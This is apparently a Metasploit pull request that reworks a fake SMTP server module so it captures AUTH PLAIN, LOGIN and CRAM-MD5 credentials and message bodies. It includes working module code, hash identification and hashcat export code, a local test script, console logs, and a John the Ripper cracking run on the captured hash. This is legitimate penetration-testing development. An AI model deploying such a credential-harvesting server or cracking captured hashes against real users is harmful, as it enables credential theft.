### PR TITLE
aux/server/capture/smtp now captures auth!

### DIFF
--- a/documentation/modules/auxiliary/server/capture/smtp.md
+++ b/documentation/modules/auxiliary/server/capture/smtp.md
@@ -99,7 +99,7 @@ The following script should test the following:
 
 ### Output from testing script
 
-When this script is run from the metasploit console, it intermingles with the commands, which is great!
+When this script is run from the Metasploit console, it intermingles with the commands, which is great!
 
 ```
 $ sudo ./msfconsole -qx 'use auxiliary/server/capture/smtp; set srvhost 127.0.0.1;run;ruby tools/dev/test_capture_smtp.rb'

--- a/documentation/modules/auxiliary/server/capture/smtp.md
+++ b/documentation/modules/auxiliary/server/capture/smtp.md
@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-This module creates a mock SMTP server which accepts credentials or unautheneticated email
+This module creates a mock SMTP server which accepts credentials or unauthenticated email
 before throwing a `503` error.
 
 ## Verification Steps

--- a/documentation/modules/auxiliary/server/capture/smtp.md
+++ b/documentation/modules/auxiliary/server/capture/smtp.md
@@ -1,0 +1,196 @@
+## Vulnerable Application
+
+This module creates a mock SMTP server which accepts credentials or unautheneticated email
+before throwing a `503` error.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: ```use auxiliary/server/capture/smtp```
+  3. Do: ```run```
+
+## Options
+
+## Scenarios
+
+### Testing Script
+
+The following script should test the following:
+
+1. Auth Plain
+2. Auth Login
+3. Auth CRAM-MD5
+4. Sending an email w/o auth
+5. RSET is implemented (https://github.com/rapid7/metasploit-framework/issues/11980)
+
+    ```
+    require 'net/smtp'
+    require 'socket'
+
+    puts 'Testing: plain'
+    begin
+      Net::SMTP.start('127.0.0.1', 25, 'localhost', 'username_plain', 'password_plain', :plain)
+    rescue => e
+      puts "Error: #{e}"
+    end
+    
+    puts 'Testing: login'
+    begin
+      Net::SMTP.start('127.0.0.1', 25, 'localhost', 'username_login', 'password_login', :login)
+    rescue => e
+      puts "Error: #{e}"
+    end
+    
+    puts 'Testing: cram md5'
+    begin
+      Net::SMTP.start('127.0.0.1', 25, 'localhost', 'username_cram', 'password_cram', :cram_md5)
+    rescue => e
+      puts "Error: #{e}"
+    end
+    
+    puts 'Testing: DATA'
+    begin
+      Net::SMTP.start('127.0.0.1') do |smtp|
+        smtp.send_message 'test', 'from@test.com', 'to@test.com'
+      end
+    rescue => e
+      puts "Error: #{e}"
+    end
+    
+    
+    # test for https://github.com/rapid7/metasploit-framework/issues/11980
+    puts 'Testing: RSET during DATA'
+    begin
+      t = TCPSocket.open('127.0.0.1', 25)
+      t.gets
+      t.print("EHLO localhost \r\n")
+      t.gets
+      t.print("MAIL FROM:<from@test.com>\r\n")
+      t.gets
+      t.print("MAIL TO:<to@test.com>\r\n")
+      t.gets
+      t.print("DATA\r\n")
+      t.gets
+      t.print("RSET\r\n")
+      puts "  Response: #{t.gets.chop}"
+    rescue => e
+      puts "Error: #{e}"
+    end
+
+    puts 'Testing: RSET during middle of DATA'
+    begin
+      t = TCPSocket.open('127.0.0.1', 25)
+      t.gets
+      t.print("EHLO localhost \r\n")
+      t.gets
+      t.print("MAIL FROM:<from@test.com>\r\n")
+      t.gets
+      t.print("MAIL TO:<to@test.com>\r\n")
+      t.gets
+      t.print("DATA\r\n")
+      t.gets
+      t.print("testing a message which gets cancelled\r\n")
+      t.print("RSET\r\n")
+      puts "  Response: #{t.gets.chop}"
+    rescue => e
+      puts "Error: #{e}"
+    end
+    ```
+
+### Output from testing script
+
+When this script is run from the metasploit console, it intermingles with the commands, which is great!
+
+```
+$ sudo ./msfconsole -qx 'use auxiliary/server/capture/smtp; set srvhost 127.0.0.1;run;ruby tools/dev/test_capture_smtp.rb'
+srvhost => 127.0.0.1
+[*] Auxiliary module running as background job 0.
+[*] exec: ruby tools/dev/test_capture_smtp.rb
+
+[*] Started service listener on 127.0.0.1:25 
+[*] Server started.
+Testing: plain
+[*] SMTP: 127.0.0.1:46212 Command: EHLO localhost
+[*] SMTP: 127.0.0.1:46212 Command: AUTH PLAIN AHVzZXJuYW1lX3BsYWluAHBhc3N3b3JkX3BsYWlu
+[+] SMTP LOGIN 127.0.0.1:46212 username_plain / password_plain
+Testing: login
+[*] SMTP: 127.0.0.1:46214 Command: EHLO localhost
+[*] SMTP: 127.0.0.1:46214 Command: AUTH LOGIN
+[*] SMTP: 127.0.0.1:46214 Command: dXNlcm5hbWVfbG9naW4=
+[*] SMTP: 127.0.0.1:46214 Command: cGFzc3dvcmRfbG9naW4=
+[+] SMTP LOGIN 127.0.0.1:46214 username_login / password_login
+Testing: cram md5
+[*] SMTP: 127.0.0.1:46216 Command: EHLO localhost
+[*] SMTP: 127.0.0.1:46216 Command: AUTH CRAM-MD5
+[*] SMTP: 127.0.0.1:46216 Command: dXNlcm5hbWVfY3JhbSA3YjA2NzUyMjVhM2FjMmI5MjMxYzJlOTM5OTg2Y2U0Mg==
+Testing: DATA
+[+] SMTP LOGIN 127.0.0.1:46216 username_cram / <12345@127.0.0.1>#7b0675225a3ac2b9231c2e939986ce42
+[*] SMTP: 127.0.0.1:46218 Command: EHLO localhost
+[*] SMTP: 127.0.0.1:46218 Command: MAIL FROM:<from@test.com>
+[*] SMTP: 127.0.0.1:46218 Command: RCPT TO:<to@test.com>
+[*] SMTP: 127.0.0.1:46218 Command: DATA
+[*] SMTP: 127.0.0.1:46218 Command: test
+.
+[*] SMTP: 127.0.0.1:46218 EMAIL: test
+[*] SMTP: 127.0.0.1:46218 Command: QUIT
+Testing: RSET during DATA
+[*] SMTP: 127.0.0.1:46220 Command: EHLO localhost
+[*] SMTP: 127.0.0.1:46220 Command: MAIL FROM:<from@test.com>
+[*] SMTP: 127.0.0.1:46220 Command: MAIL TO:<to@test.com>
+[*] SMTP: 127.0.0.1:46220 Command: DATA
+[*] SMTP: 127.0.0.1:46220 Command: RSET
+  Response: 250 OK
+Testing: RSET during middle of DATA
+[*] SMTP: 127.0.0.1:46222 Command: EHLO localhost
+[*] SMTP: 127.0.0.1:46222 Command: MAIL FROM:<from@test.com>
+[*] SMTP: 127.0.0.1:46222 Command: MAIL TO:<to@test.com>
+[*] SMTP: 127.0.0.1:46222 Command: DATA
+[*] SMTP: 127.0.0.1:46222 Command: testing a message which gets cancelled
+RSET
+[*] SMTP: 127.0.0.1:46222 EMAIL: testing a message which gets cancelled
+  Response: 250 OK
+msf5 auxiliary(server/capture/smtp) > creds
+Credentials
+===========
+
+host       origin     service        public          private                                             realm  private_type        JtR Format
+----       ------     -------        ------          -------                                             -----  ------------        ----------
+127.0.0.1  127.0.0.1  25/tcp (smtp)  username_cram   <12345@127.0.0.1>#7b0675225a3ac2b9231c2e939986ce42         Nonreplayable hash  hmac-md5
+127.0.0.1  127.0.0.1  25/tcp (smtp)  username_login  password_login                                             Password            
+127.0.0.1  127.0.0.1  25/tcp (smtp)  username_plain  password_plain                                             Password            
+
+msf5 auxiliary(server/capture/smtp) > notes
+
+Notes
+=====
+
+ Time                     Host       Service  Port  Protocol  Type          Data
+ ----                     ----       -------  ----  --------  ----          ----
+ 2020-04-17 15:11:24 UTC  127.0.0.1                           smtp_message  "testing a message which gets cancelled\r\n"
+
+
+```
+
+### Cracking Cram-md5 (hmac-md5)
+
+Metasploit currently doesn't have a cracker for `hmac-md5`, however the output is pre-formatted to JTR standards,
+and `creds -o /tmp/file.jtr` will export it correctly for John.  It is also possible to export to hashcat format
+with `creds -o /tmp/file.hcat` and mode `10200`.
+
+```
+user@kali:~/metasploit-framework$ sudo cat /tmp/cram
+username_cram:<12345@127.0.0.1>#7b0675225a3ac2b9231c2e939986ce42
+user@kali:~/metasploit-framework$ sudo cat /tmp/wordlist 
+password_cram
+user@kali:~/metasploit-framework$ sudo john --wordlist=/tmp/wordlist --format=hmac-md5 /tmp/cram
+Using default input encoding: UTF-8
+Loaded 1 password hash (HMAC-MD5 [password is key, MD5 256/256 AVX2 8x3])
+Warning: poor OpenMP scalability for this hash type, consider --fork=8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+Warning: Only 1 candidate left, minimum 192 needed for performance.
+password_cram    (username_cram)
+1g 0:00:00:00 DONE (2020-04-17 11:32) 50.00g/s 50.00p/s 50.00c/s 50.00C/s password_cram
+Use the "--show --format=HMAC-MD5" options to display all of the cracked passwords reliably
+Session completed
+```

--- a/lib/metasploit/framework/hashes/identify.rb
+++ b/lib/metasploit/framework/hashes/identify.rb
@@ -86,6 +86,9 @@ def identify_hash(hash)
       return 'android-sha1'
     when hash  =~/^[A-F0-9]{32}:[a-f0-9]{16}$/
       return 'android-md5'
+    # other
+    when hash =~ /^<\d+@.+>#[\w]{32}$/
+      return 'hmac-md5'
   end
   ''
 end

--- a/lib/metasploit/framework/hashes/identify.rb
+++ b/lib/metasploit/framework/hashes/identify.rb
@@ -87,7 +87,7 @@ def identify_hash(hash)
     when hash  =~/^[A-F0-9]{32}:[a-f0-9]{16}$/
       return 'android-md5'
     # other
-    when hash =~ /^<\d+@.+>#[\w]{32}$/
+    when hash =~ /^<\d+@.+?>#[\w]{32}$/
       return 'hmac-md5'
   end
   ''

--- a/lib/metasploit/framework/password_crackers/cracker.rb
+++ b/lib/metasploit/framework/password_crackers/cracker.rb
@@ -182,6 +182,8 @@ module Metasploit
             '110'
           when 'android-md5'
             '10'
+          when 'hmac-md5'
+            '10200'
           else
             nil
           end

--- a/lib/metasploit/framework/password_crackers/hashcat/formatter.rb
+++ b/lib/metasploit/framework/password_crackers/hashcat/formatter.rb
@@ -37,6 +37,10 @@ def hash_to_hashcat(cred)
       #         legacy MD5
       # T: = 160 characters
       #         PBKDF2-based SHA512 hash specific to 12C (12.1.0.2+)
+    when /hmac-md5/
+      data = cred.private.data.split('#')
+      password = Rex::Text.encode_base64("#{cred.public.username} #{data[1]}")
+      return "$cram_md5$#{Rex::Text.encode_base64(data[0])}$#{password}"
     when /raw-sha1|oracle11/ # oracle 11, hash-mode: 112
       if cred.private.data =~ /S:([\dA-F]{60})/ # oracle 11
         # hashcat wants a 40 character string, : 20 character string

--- a/modules/auxiliary/server/capture/smtp.rb
+++ b/modules/auxiliary/server/capture/smtp.rb
@@ -53,7 +53,15 @@ class MetasploitModule < Msf::Auxiliary
 
   def auth_plain_parser(data)
     # this data is \00 delimited, and has 3 fields: un\00un\00\pass.  Not sure why a double username, but we drop the first one
-    Rex::Text.decode_base64(data).split("\00").drop(1)
+    data = Rex::Text.decode_base64(data).split("\00")
+    data = data.drop(1)
+
+    # if only a username is submitted, it will appear as \00un\00
+    # we already cut off the empty username, so nowe we want to add on the empty password
+    if data.length == 1
+      data << ""
+    end
+    data
   end
 
   def on_client_connect(client)

--- a/modules/auxiliary/server/capture/smtp.rb
+++ b/modules/auxiliary/server/capture/smtp.rb
@@ -28,7 +28,8 @@ class MetasploitModule < Msf::Auxiliary
       'DefaultAction'  => 'Capture',
       'References' =>
         [
-          ['URL', 'https://www.samlogic.net/articles/smtp-commands-reference-auth.htm']
+          ['URL', 'https://www.samlogic.net/articles/smtp-commands-reference-auth.htm'],
+          ['URL', 'http://fehcom.de/qmail/smtpauth.html']
         ],
     )
 
@@ -236,7 +237,7 @@ class MetasploitModule < Msf::Auxiliary
       vprint_error("Unknown command: #{arg}")
     end
     c.put "503 Server Error\r\n"
-  
+
   end
 
   def report_cred(opts)

--- a/modules/auxiliary/server/capture/smtp.rb
+++ b/modules/auxiliary/server/capture/smtp.rb
@@ -3,21 +3,22 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'metasploit/framework/hashes/identify'
+
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::TcpServer
   include Msf::Auxiliary::Report
 
-
   def initialize
     super(
-      'Name'        => 'Authentication Capture: SMTP',
-      'Description'    => %q{
+      'Name' => 'Authentication Capture: SMTP',
+      'Description' => %q{
         This module provides a fake SMTP service that
       is designed to capture authentication credentials.
       },
-      'Author'      => ['ddz', 'hdm', 'h00die'],
-      'License'     => MSF_LICENSE,
-      'Actions'     =>
+      'Author' => ['ddz', 'hdm', 'h00die'],
+      'License' => MSF_LICENSE,
+      'Actions' =>
         [
           [ 'Capture' ]
         ],
@@ -25,18 +26,20 @@ class MetasploitModule < Msf::Auxiliary
         [
           'Capture'
         ],
-      'DefaultAction'  => 'Capture',
+      'DefaultAction' => 'Capture',
       'References' =>
         [
-          ['URL', 'https://www.samlogic.net/articles/smtp-commands-reference-auth.htm'],
-          ['URL', 'http://fehcom.de/qmail/smtpauth.html']
+          [ 'URL', 'https://www.samlogic.net/articles/smtp-commands-reference-auth.htm' ],
+          [ 'URL', 'tools.ietf.org/html/rfc5321' ],
+          [ 'URL', 'http://fehcom.de/qmail/smtpauth.html' ]
         ],
     )
 
     register_options(
       [
-        OptPort.new('SRVPORT',    [ true, "The local port to listen on.", 25 ])
-      ])
+        OptPort.new('SRVPORT', [ true, 'The local port to listen on.', 25 ])
+      ]
+    )
   end
 
   def setup
@@ -45,7 +48,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    exploit()
+    exploit
   end
 
   def auth_plain_parser(data)
@@ -53,190 +56,191 @@ class MetasploitModule < Msf::Auxiliary
     Rex::Text.decode_base64(data).split("\00").drop(1)
   end
 
-  def on_client_connect(c)
-    @state[c] = {:name => "#{c.peerhost}:#{c.peerport}", :ip => c.peerhost, :port => c.peerport, :user => nil, :pass => nil}
-    c.put "220 SMTP Server Ready\r\n"
+  def on_client_connect(client)
+    @state[client] = { name: "#{client.peerhost}:#{client.peerport}", ip: client.peerhost, port: client.peerport, user: nil, pass: nil }
+    client.put "220 SMTP Server Ready\r\n"
   end
 
-  def on_client_data(c)
-    data = c.get_once
-    return if not data
+  def on_client_data(client)
+    data = client.get_once
+    return if !data
 
-    print_status("SMTP: #{@state[c][:name]} Command: #{data.strip}")
+    print_status("SMTP: #{@state[client][:name]} Command: #{data.strip}")
 
-    if(@state[c][:data_mode])
+    if (@state[client][:data_mode])
+      @state[client][:data_buff] ||= ''
+      @state[client][:data_buff] += data
 
-      @state[c][:data_buff] ||= ''
-      @state[c][:data_buff] += data
-
-      idx = @state[c][:data_buff].index("\r\n.\r\n")
-      if(idx)
+      idx = @state[client][:data_buff].index("\r\n.\r\n")
+      if data.include? "RSET\r\n"
+        idx = @state[client][:data_buff].index("RSET\r\n")
+      end
+      if idx
         report_note(
-          :host => @state[c][:ip],
-          :type => "smtp_message",
-          :data => @state[c][:data_buff][0,idx]
+          host: @state[client][:ip],
+          type: 'smtp_message',
+          data: @state[client][:data_buff][0, idx]
         )
-        @state[c][:data_buff][0,idx].split("\n").each do |line|
-          print_status("SMTP: #{@state[c][:name]} EMAIL: #{line.strip}")
+        @state[client][:data_buff][0, idx].split("\n").each do |line|
+          print_status("SMTP: #{@state[client][:name]} EMAIL: #{line.strip}")
         end
 
-        @state[c][:data_buff] = nil
-        @state[c][:data_mode] = nil
-        c.put "250 OK\r\n"
+        @state[client][:data_buff] = nil
+        @state[client][:data_mode] = nil
+        client.put "250 OK\r\n"
       end
 
       return
     end
 
-    if(@state[c][:auth_login])
-      if @state[c][:user].nil?
-        @state[c][:user] = Rex::Text.decode_base64(data)
-        c.put "334 #{Rex::Text.encode_base64('Password')}\r\n"
+    if (@state[client][:auth_login])
+      if @state[client][:user].nil?
+        @state[client][:user] = Rex::Text.decode_base64(data)
+        client.put "334 #{Rex::Text.encode_base64('Password')}\r\n"
         return
       end
-      @state[c][:pass] = Rex::Text.decode_base64(data)
-      print_good("SMTP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
+      @state[client][:pass] = Rex::Text.decode_base64(data)
+      print_good("SMTP LOGIN #{@state[client][:name]} #{@state[client][:user]} / #{@state[client][:pass]}")
       report_cred(
-        ip: @state[c][:ip],
+        ip: @state[client][:ip],
         port: datastore['SRVPORT'],
         service_name: 'smtp',
-        user: @state[c][:user],
-        password: @state[c][:pass],
+        user: @state[client][:user],
+        password: @state[client][:pass],
         proof: data # will be base64 encoded, but its proof...
       )
-      @state[c][:auth_login] = nil
-      c.put "235 2.7.0 Authentication successful\r\n"
+      @state[client][:auth_login] = nil
+      client.put "235 2.7.0 Authentication successful\r\n"
       return
     end
 
-    if(@state[c][:auth_plain])
+    if (@state[client][:auth_plain])
       # this data is \00 delimited, and has 3 fields: un\00un\00\pass.  Not sure why a double username
       un_pass = auth_plain_parser data
 
-      @state[c][:user] = un_pass.first
-      @state[c][:pass] = un_pass.last
-      print_good("SMTP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
+      @state[client][:user] = un_pass.first
+      @state[client][:pass] = un_pass.last
+      print_good("SMTP LOGIN #{@state[client][:name]} #{@state[client][:user]} / #{@state[client][:pass]}")
       report_cred(
-        ip: @state[c][:ip],
+        ip: @state[client][:ip],
         port: datastore['SRVPORT'],
         service_name: 'smtp',
-        user: @state[c][:user],
-        password: @state[c][:pass],
+        user: @state[client][:user],
+        password: @state[client][:pass],
         proof: data # will be base64 encoded, but its proof...
       )
-      @state[c][:auth_plain] = nil
-      c.put "235 2.7.0 Authentication successful\r\n"
+      @state[client][:auth_plain] = nil
+      client.put "235 2.7.0 Authentication successful\r\n"
       return
     end
 
-    if(@state[c][:auth_cram])
-      #data is <username><space><digest aka hash>
+    if (@state[client][:auth_cram])
+      # data is <username><space><digest aka hash>
       decoded = Rex::Text.decode_base64(data).split(' ')
-      @state[c][:user] = decoded.first
+      @state[client][:user] = decoded.first
       # challenge # response
-      @state[c][:pass] = "#{@state[c][:auth_cram_challenge]}##{decoded.last}"
+      @state[client][:pass] = "#{@state[client][:auth_cram_challenge]}##{decoded.last}"
       report_cred(
-        ip: @state[c][:ip],
+        ip: @state[client][:ip],
         port: datastore['SRVPORT'],
         service_name: 'smtp',
-        user: @state[c][:user],
-        password: @state[c][:pass],
+        user: @state[client][:user],
+        password: @state[client][:pass],
         proof: data, # will be base64 encoded, but its proof...
         type: 'cram'
       )
-      c.put "235 2.7.0 Authentication successful\r\n"
-      print_good("SMTP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
-      @state[c][:auth_cram_challenge] = nil
-      @state[c][:auth_cram] = nil
+      client.put "235 2.7.0 Authentication successful\r\n"
+      print_good("SMTP LOGIN #{@state[client][:name]} #{@state[client][:user]} / #{@state[client][:pass]}")
+      @state[client][:auth_cram_challenge] = nil
+      @state[client][:auth_cram] = nil
       return
     end
 
-
-    cmd,arg = data.strip.split(/\s+/, 2)
-    arg ||= ""
+    cmd, arg = data.strip.split(/\s+/, 2)
+    arg ||= ''
 
     case cmd.upcase
     when 'HELO', 'EHLO'
-      c.put "250 OK\r\n"
+      client.put "250 OK\r\n"
       return
 
     when 'MAIL'
-      x,from = data.strip.split(":", 2)
-      @state[c][:from] = from.strip
-      c.put "250 OK\r\n"
+      _, from = data.strip.split(':', 2)
+      @state[client][:from] = from.strip
+      client.put "250 OK\r\n"
       return
 
     when 'RCPT'
-      x,targ = data.strip.split(":", 2)
-      @state[c][:rcpt] = targ.strip
-      c.put "250 OK\r\n"
+      _, targ = data.strip.split(':', 2)
+      @state[client][:rcpt] = targ.strip
+      client.put "250 OK\r\n"
       return
 
     when 'DATA'
-      @state[c][:data_mode] = true
-      c.put "500 Error\r\n"
+      @state[client][:data_mode] = true
+      client.put "354 Send message content; end with <CRLF>.<CRLF>\r\n"
       return
 
     when 'QUIT'
-      c.put "221 OK\r\n"
+      client.put "221 OK\r\n"
       return
 
     when 'PASS'
 
-      @state[c][:pass] = arg
+      @state[client][:pass] = arg
 
       report_cred(
-        ip: @state[c][:ip],
+        ip: @state[client][:ip],
         port: datastore['SRVPORT'],
         service_name: 'pop3',
-        user: @state[c][:user],
-        password: @state[c][:pass],
+        user: @state[client][:user],
+        password: @state[client][:pass],
         proof: arg
       )
-      print_good("SMTP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
+      print_good("SMTP LOGIN #{@state[client][:name]} #{@state[client][:user]} / #{@state[client][:pass]}")
       return
 
     when 'AUTH'
       if arg == 'LOGIN'
-        @state[c][:auth_login] = true
-        c.put "334 #{Rex::Text.encode_base64('Username')}\r\n"
+        @state[client][:auth_login] = true
+        client.put "334 #{Rex::Text.encode_base64('Username')}\r\n"
         return
       elsif arg.split(' ').first == 'PLAIN'
         if arg.include? ' ' # the creds are passed as well
           un_pass = auth_plain_parser arg.split(' ').last
 
-          @state[c][:user] = un_pass.first
-          @state[c][:pass] = un_pass.last
-          print_good("SMTP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
+          @state[client][:user] = un_pass.first
+          @state[client][:pass] = un_pass.last
+          print_good("SMTP LOGIN #{@state[client][:name]} #{@state[client][:user]} / #{@state[client][:pass]}")
           report_cred(
-            ip: @state[c][:ip],
+            ip: @state[client][:ip],
             port: datastore['SRVPORT'],
             service_name: 'smtp',
-            user: @state[c][:user],
-            password: @state[c][:pass],
+            user: @state[client][:user],
+            password: @state[client][:pass],
             proof: data # will be base64 encoded, but its proof...
           )
-          c.put "235 2.7.0 Authentication successful\r\n"
+          client.put "235 2.7.0 Authentication successful\r\n"
           return
         end
-        @state[c][:auth_plain] = true
-        c.put "334\r\n"
+        @state[client][:auth_plain] = true
+        client.put "334\r\n"
         return
       elsif arg == 'CRAM-MD5'
         # create and send challenge
-        challenge = Rex::Text.encode_base64("<12345@#{datastore['SRVHOST']}>")
-        c.put "334 #{challenge}\r\n"
-        @state[c][:auth_cram] = true
-        @state[c][:auth_cram_challenge] = "<12345@#{datastore['SRVHOST']}>"
+        challenge = "<#{Rex::Text.rand_text_numeric(9..12)}@#{datastore['SRVHOST']}>"
+        client.put "334 #{Rex::Text.encode_base64(challenge)}\r\n"
+        @state[client][:auth_cram] = true
+        @state[client][:auth_cram_challenge] = challenge
         return
       end
       # some other auth we dont understand
       vprint_error("Unknown authentication type string: #{arg}")
-      c.put "503 Server Error\r\n"
+      client.put "503 Server Error\r\n"
     else
       vprint_error("Unknown command: #{arg}")
     end
-    c.put "503 Server Error\r\n"
+    client.put "503 Server Error\r\n"
 
   end
 
@@ -248,14 +252,14 @@ class MetasploitModule < Msf::Auxiliary
       protocol: 'tcp',
       workspace_id: myworkspace_id
     }
-    if type == 'cram'
+    if opts[:type] == 'cram'
       credential_data = {
         origin_type: :service,
         module_fullname: fullname,
         username: opts[:user],
         private_data: opts[:password],
         private_type: :nonreplayable_hash,
-        jtr_format: 'hmac-md5'
+        jtr_format: identify_hash(opts[:password])
       }.merge(service_data)
     else
       credential_data = {
@@ -276,9 +280,8 @@ class MetasploitModule < Msf::Auxiliary
     create_credential_login(login_data)
   end
 
-  def on_client_close(c)
-    @state.delete(c)
+  def on_client_close(client)
+    @state.delete(client)
   end
-
 
 end

--- a/spec/lib/metasploit/framework/hashes/identify_spec.rb
+++ b/spec/lib/metasploit/framework/hashes/identify_spec.rb
@@ -259,6 +259,13 @@ RSpec.describe 'hashes/identify' do
     end
   end
 
+  describe 'identify_hmac_md5' do
+    it 'returns hmac-md5' do
+      hash = identify_hash('<771138767145@127.0.0.1>#332b463fcf3baac718c63860a7093df4')
+      expect(hash).to match ('hmac-md5')
+    end
+  end
+
   describe 'identify_empty_string' do
     it 'returns empty string' do
       hash = identify_hash('')


### PR DESCRIPTION
fixes #11980

`auxiliary/server/capture/smtp` seems broken.  It doesn't capture any `AUTH`, `DATA` sends an error before actually accepting any.  It needs an overhaul.

This PR fixes:
1. Implements `AUTH login` and stores the creds to the db
2. Implements `AUTH cram-md5` and stores the creds to the db.  This is a hash, so we store it like that, and it is now identified in the hash id lib, and can be exported with the creds command to JTR and hashcat format.
3. Implements `AUTH plain` and stores the creds to the db
4. added some references like the RFC and examples of a server/client running (was useful for debugging)
5. Implemented the `RSET` command as described in #11980
6. Fixed `DATA` so it actually works and stores the data to `notes`
7. Added documentation, including a testing script so you can verify things works.  Also updated the wiki with the `cram-md5` stuff.
8. Let `rubocop -a` go at `smtp.rb`

## Testing
See the module docs for a script you can use to test the updates to this module.

## pre:
We only *see* the command with `auth plain` but nothing is put in the db, and it isn't decoded.  `rset` also makes it hang until a timeout (maybe?, i hit ctr+c)

```
$ sudo ./msfconsole -qx 'use auxiliary/server/capture/smtp; set srvhost 127.0.0.1;run;ruby tools/dev/test_capture_smtp.rb;creds;notes'
srvhost => 127.0.0.1
[*] Auxiliary module running as background job 0.
[*] exec: ruby tools/dev/test_capture_smtp.rb

[*] Started service listener on 127.0.0.1:25 
[*] Server started.
Testing: plain
[*] SMTP: 127.0.0.1:48524 Command: EHLO localhost
[*] SMTP: 127.0.0.1:48524 Command: AUTH PLAIN AHVzZXJuYW1lX3BsYWluAHBhc3N3b3JkX3BsYWlu
Error: 503 Server Error
Testing: login
[*] SMTP: 127.0.0.1:48526 Command: EHLO localhost
[*] SMTP: 127.0.0.1:48526 Command: AUTH LOGIN
Error: 503 Server Error
Testing: cram md5
[*] SMTP: 127.0.0.1:48528 Command: EHLO localhost
[*] SMTP: 127.0.0.1:48528 Command: AUTH CRAM-MD5
Error: 503 Server Error
Testing: DATA
[*] SMTP: 127.0.0.1:48530 Command: EHLO localhost
[*] SMTP: 127.0.0.1:48530 Command: MAIL FROM:<from@test.com>
[*] SMTP: 127.0.0.1:48530 Command: RCPT TO:<to@test.com>
[*] SMTP: 127.0.0.1:48530 Command: DATA
Error: could not get 3xx (500: 500 Error
)
Testing: RSET during DATA
[*] SMTP: 127.0.0.1:48532 Command: EHLO localhost
[*] SMTP: 127.0.0.1:48532 Command: MAIL FROM:<from@test.com>
[*] SMTP: 127.0.0.1:48532 Command: MAIL TO:<to@test.com>
[*] SMTP: 127.0.0.1:48532 Command: DATA
[*] SMTP: 127.0.0.1:48532 Command: RSET

^CTraceback (most recent call last):
        1: from tools/dev/test_capture_smtp.rb:49:in `<main>'

Aborting...tools/dev/test_capture_smtp.rb:49:in `gets'
: Interrupt
[*] Server stopped.
```

## post:
we capture all the things.
```
$ sudo ./msfconsole -qx 'use auxiliary/server/capture/smtp; set srvhost 127.0.0.1;run;ruby tools/dev/test_capture_smtp.rb;creds;notes'
srvhost => 127.0.0.1
[*] Auxiliary module running as background job 0.
[*] exec: ruby tools/dev/test_capture_smtp.rb

[*] Started service listener on 127.0.0.1:25 
[*] Server started.
Testing: plain
[*] SMTP: 127.0.0.1:48488 Command: EHLO localhost
[*] SMTP: 127.0.0.1:48488 Command: AUTH PLAIN AHVzZXJuYW1lX3BsYWluAHBhc3N3b3JkX3BsYWlu
[+] SMTP LOGIN 127.0.0.1:48488 username_plain / password_plain
Testing: login
[*] SMTP: 127.0.0.1:48490 Command: EHLO localhost
[*] SMTP: 127.0.0.1:48490 Command: AUTH LOGIN
[*] SMTP: 127.0.0.1:48490 Command: dXNlcm5hbWVfbG9naW4=
[*] SMTP: 127.0.0.1:48490 Command: cGFzc3dvcmRfbG9naW4=
[+] SMTP LOGIN 127.0.0.1:48490 username_login / password_login
Testing: cram md5
[*] SMTP: 127.0.0.1:48492 Command: EHLO localhost
[*] SMTP: 127.0.0.1:48492 Command: AUTH CRAM-MD5
[*] SMTP: 127.0.0.1:48492 Command: aG1hY19wYXNzd29yZCBjYzM3ZmJjMjAwN2EwZjM4YmMzMjFmODJhM2NhOWZlMA==
Testing: DATA
[+] SMTP LOGIN 127.0.0.1:48492 hmac_password / <381330614@127.0.0.1>#cc37fbc2007a0f38bc321f82a3ca9fe0
[*] SMTP: 127.0.0.1:48494 Command: EHLO localhost
[*] SMTP: 127.0.0.1:48494 Command: MAIL FROM:<from@test.com>
[*] SMTP: 127.0.0.1:48494 Command: RCPT TO:<to@test.com>
[*] SMTP: 127.0.0.1:48494 Command: DATA
[*] SMTP: 127.0.0.1:48494 Command: test
.
[*] SMTP: 127.0.0.1:48494 EMAIL: test
[*] SMTP: 127.0.0.1:48494 Command: QUIT
Testing: RSET during DATA
[*] SMTP: 127.0.0.1:48496 Command: EHLO localhost
[*] SMTP: 127.0.0.1:48496 Command: MAIL FROM:<from@test.com>
[*] SMTP: 127.0.0.1:48496 Command: MAIL TO:<to@test.com>
[*] SMTP: 127.0.0.1:48496 Command: DATA
[*] SMTP: 127.0.0.1:48496 Command: RSET
  Response: 250 OK
Testing: RSET during middle of DATA
[*] SMTP: 127.0.0.1:48498 Command: EHLO localhost
[*] SMTP: 127.0.0.1:48498 Command: MAIL FROM:<from@test.com>
[*] SMTP: 127.0.0.1:48498 Command: MAIL TO:<to@test.com>
[*] SMTP: 127.0.0.1:48498 Command: DATA
[*] SMTP: 127.0.0.1:48498 Command: testing a message which gets cancelled
RSET
[*] SMTP: 127.0.0.1:48498 EMAIL: testing a message which gets cancelled
  Response: 250 OK
Credentials
===========

host       origin     service        public          private                                                 realm  private_type        JtR Format
----       ------     -------        ------          -------                                                 -----  ------------        ----------
127.0.0.1  127.0.0.1  25/tcp (smtp)  hmac_password   <381330614@127.0.0.1>#cc37fbc2007a0f38bc321f82a3ca9fe0         Nonreplayable hash  hmac-md5
127.0.0.1  127.0.0.1  25/tcp (smtp)  username_login  password_login                                                 Password            
127.0.0.1  127.0.0.1  25/tcp (smtp)  username_plain  password_plain                                                 Password            


Notes
=====

 Time                     Host       Service  Port  Protocol  Type          Data
 ----                     ----       -------  ----  --------  ----          ----
 2020-04-17 21:01:42 UTC  127.0.0.1                           smtp_message  "testing a message which gets cancelled\r\n"
```
While we don't have a cracker module yet for cram/hmac, this format is correct.
```
h00die@kali:~$ cat /tmp/hmac
<12345@127.0.0.1>#7b0675225a3ac2b9231c2e939986ce42
h00die@kali:~$ cat /tmp/wordlist 
password_cram
h00die@kali:~$ john --wordlist=/tmp/wordlist /tmp/hmac
Using default input encoding: UTF-8
